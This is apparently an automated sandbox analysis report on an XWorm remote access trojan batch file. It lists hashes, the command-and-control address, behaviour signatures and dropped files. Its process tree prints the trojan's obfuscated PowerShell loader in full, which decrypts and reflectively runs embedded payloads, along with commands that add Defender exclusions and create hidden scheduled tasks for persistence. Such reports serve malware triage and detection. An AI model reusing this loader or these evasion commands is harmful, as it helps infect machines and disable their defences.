Overview

overview

10

Static

static

1

xwom.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    21s
  • max time network
    13s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    19-01-2025 04:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    xwom.bat

  • Size

    289KB

  • MD5

    70f8d974c2a88306feb001f1fa941742

  • SHA1

    9af58f49b85b9b0cec9a9aa7341619be9816e11c

  • SHA256

    9474ce66db13f8709d90b965efc25787858533d44f7b2d6aae51939350547748

  • SHA512

    f0e4a5b4fb451f69b1e7bd5171ed8274d27e96f66927ff7ac9761176452e48884daa64cee526570bd07f1034e2cc982713e441f3bc2c3d9a419ddde5b58d8ede

  • SSDEEP

    6144:20eM6eHlpD0EUulZTKIeiUBMQrr3NE4E8/OUW4ncFOBr0iVU:20eMnldZTKIeAh4YUF90x

Score
10/10
xwormexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

C2

109.176.252.16:80

109.176.252.16:80:80
Attributes
  • Install_directory

    %ProgramData%

  • install_file

    WinReg32.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

    execution
  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 37 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xwom.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1456
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1356
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
          PID:4396
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7BQEaj8gKUasQgenzRDJNMLtICUmXa0OCQVFhk5BKw4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sPY+Tf54FmPqKYzuLmFhkw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KRiwI=New-Object System.IO.MemoryStream(,$param_var); $CPetX=New-Object System.IO.MemoryStream; $ZhYGE=New-Object System.IO.Compression.GZipStream($KRiwI, [IO.Compression.CompressionMode]::Decompress); $ZhYGE.CopyTo($CPetX); $ZhYGE.Dispose(); $KRiwI.Dispose(); $CPetX.Dispose(); $CPetX.ToArray();}function execute_function($param_var,$param2_var){ $HVqFo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NSQIj=$HVqFo.EntryPoint; $NSQIj.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\xwom.bat';$AERPx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\xwom.bat').Split([Environment]::NewLine);foreach ($oSYKt in $AERPx) { if ($oSYKt.StartsWith(':: ')) { $AeDnM=$oSYKt.Substring(3); break; }}$payloads_var=[string[]]$AeDnM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1608
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_721_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_721.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3472
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_721.vbs"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3904
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_721.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2960
            • C:\Windows\system32\net.exe
              net file
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2124
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 file
                6⤵
                  PID:1956
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7BQEaj8gKUasQgenzRDJNMLtICUmXa0OCQVFhk5BKw4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sPY+Tf54FmPqKYzuLmFhkw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KRiwI=New-Object System.IO.MemoryStream(,$param_var); $CPetX=New-Object System.IO.MemoryStream; $ZhYGE=New-Object System.IO.Compression.GZipStream($KRiwI, [IO.Compression.CompressionMode]::Decompress); $ZhYGE.CopyTo($CPetX); $ZhYGE.Dispose(); $KRiwI.Dispose(); $CPetX.Dispose(); $CPetX.ToArray();}function execute_function($param_var,$param2_var){ $HVqFo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NSQIj=$HVqFo.EntryPoint; $NSQIj.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_721.bat';$AERPx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_721.bat').Split([Environment]::NewLine);foreach ($oSYKt in $AERPx) { if ($oSYKt.StartsWith(':: ')) { $AeDnM=$oSYKt.Substring(3); break; }}$payloads_var=[string[]]$AeDnM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Drops startup file
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:3056
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4608
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1096
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WinReg32.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:948
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WinReg32.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1548
                • C:\Windows\System32\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WinReg32" /tr "C:\ProgramData\WinReg32.exe"
                  6⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:2728
      • C:\Windows\system32\taskmgr.exe
        "C:\Windows\system32\taskmgr.exe" /0
        1⤵
        • Checks SCSI registry key(s)
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:4508

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\WinReg32.exe
        Filesize

        440KB

        MD5

        0e9ccd796e251916133392539572a374

        SHA1

        eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

        SHA256

        c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

        SHA512

        e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        df472dcddb36aa24247f8c8d8a517bd7

        SHA1

        6f54967355e507294cbc86662a6fbeedac9d7030

        SHA256

        e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

        SHA512

        06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        f1fc3cb922137433eba6f5eefaec3f65

        SHA1

        cfcc1550869b819741a0570a60fb1cbb48d8aa50

        SHA256

        b749e695fc8be6e9b974a3f50ba82d591c7dabd4c57d5e6188ef1dcc98a15d7d

        SHA512

        079d7da5764d7ccf62a4fe118180ecd0cabd7452989b0d64c622575ad1f674e244d88a08b4f0470917ad7d5ba24ddb2471332d6361ec9d34ca412ede8d9d690c

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        d0a4a3b9a52b8fe3b019f6cd0ef3dad6

        SHA1

        fed70ce7834c3b97edbd078eccda1e5effa527cd

        SHA256

        21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

        SHA512

        1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        59f2e90fbb5fef65ad751465328ef029

        SHA1

        cef3098ae0f919dc883f13f4dbff89489dd96fd3

        SHA256

        d04d16a3f72ce160b8907b09f9abf3900f55acbeb1beec9e8b90f03d956a922f

        SHA512

        ba6dfd7d8dae080e6e7295e3fe48b0f01de2fac65f36dbb0f458e970a3f7220eea913f37db3b2d427718fb1e95b8df6730310437e2f83c77f309a72e3e501016

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        050567a067ffea4eb40fe2eefebdc1ee

        SHA1

        6e1fb2c7a7976e0724c532449e97722787a00fec

        SHA256

        3952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e

        SHA512

        341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uh4sib2d.pru.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinReg32.lnk
        Filesize

        677B

        MD5

        09b7256f7a5f13c48064d2d93e85a538

        SHA1

        57025cf5e2f6d6ffe4ea16578acf68209ffe9727

        SHA256

        0d43f30a5592f3e127912e88d75b0cdf4e38b6f3ac33bba45476fde950911fbb

        SHA512

        882fd6125207dd660e1bdcd6d2a71323a2610c6e3fce1249a42568e8751a906ae128a454604afe8856b3a51ab59dbb4d78b5ab4411d48b53a36e2337bc208aa2

        Download Submit

      • C:\Users\Admin\AppData\Roaming\startup_str_721.bat
        Filesize

        289KB

        MD5

        70f8d974c2a88306feb001f1fa941742

        SHA1

        9af58f49b85b9b0cec9a9aa7341619be9816e11c

        SHA256

        9474ce66db13f8709d90b965efc25787858533d44f7b2d6aae51939350547748

        SHA512

        f0e4a5b4fb451f69b1e7bd5171ed8274d27e96f66927ff7ac9761176452e48884daa64cee526570bd07f1034e2cc982713e441f3bc2c3d9a419ddde5b58d8ede

        Download Submit

      • C:\Users\Admin\AppData\Roaming\startup_str_721.vbs
        Filesize

        115B

        MD5

        6e0a3971056f5f6eef950e313d6171a1

        SHA1

        5c11906df91064547290510d7ccc090d70f80fab

        SHA256

        5cc0fe9afd14be934fcd84affc9e62028b970db959f7e1e3bc6d7c586062cc6e

        SHA512

        b1ac8dc9f7a04a70f623862335c15697b2af4a0d97368532e4773ff437fc80e2e43a52d2bea06325118826b319699ba023b15930322cb2d57eebf0234d47f521

        Download Submit

      • memory/1608-0-0x00007FF881773000-0x00007FF881775000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1608-14-0x00000262F2090000-0x00000262F20C8000-memory.dmp

        Filesize

        224KB

        Download

      • memory/1608-13-0x00000262EFC60000-0x00000262EFC68000-memory.dmp

        Filesize

        32KB

        Download

      • memory/1608-12-0x00007FF881770000-0x00007FF882232000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1608-11-0x00007FF881770000-0x00007FF882232000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1608-10-0x00007FF881770000-0x00007FF882232000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1608-48-0x00007FF881770000-0x00007FF882232000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1608-49-0x00007FF881773000-0x00007FF881775000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1608-50-0x00007FF881770000-0x00007FF882232000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1608-9-0x00000262EFC70000-0x00000262EFC92000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3056-47-0x0000017ACBF10000-0x0000017ACBF26000-memory.dmp

        Filesize

        88KB

        Download

      • memory/3472-16-0x00007FF881770000-0x00007FF882232000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3472-29-0x00007FF881770000-0x00007FF882232000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3472-25-0x00007FF881770000-0x00007FF882232000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3472-26-0x00007FF881770000-0x00007FF882232000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4508-100-0x00000285FD8D0000-0x00000285FD8D1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/4508-102-0x00000285FD8D0000-0x00000285FD8D1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/4508-101-0x00000285FD8D0000-0x00000285FD8D1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/4508-91-0x00000285FD8D0000-0x00000285FD8D1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/4508-99-0x00000285FD8D0000-0x00000285FD8D1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/4508-98-0x00000285FD8D0000-0x00000285FD8D1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/4508-97-0x00000285FD8D0000-0x00000285FD8D1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/4508-96-0x00000285FD8D0000-0x00000285FD8D1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/4508-92-0x00000285FD8D0000-0x00000285FD8D1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/4508-90-0x00000285FD8D0000-0x00000285FD8D1000-memory.dmp

        Filesize

        4KB

        Download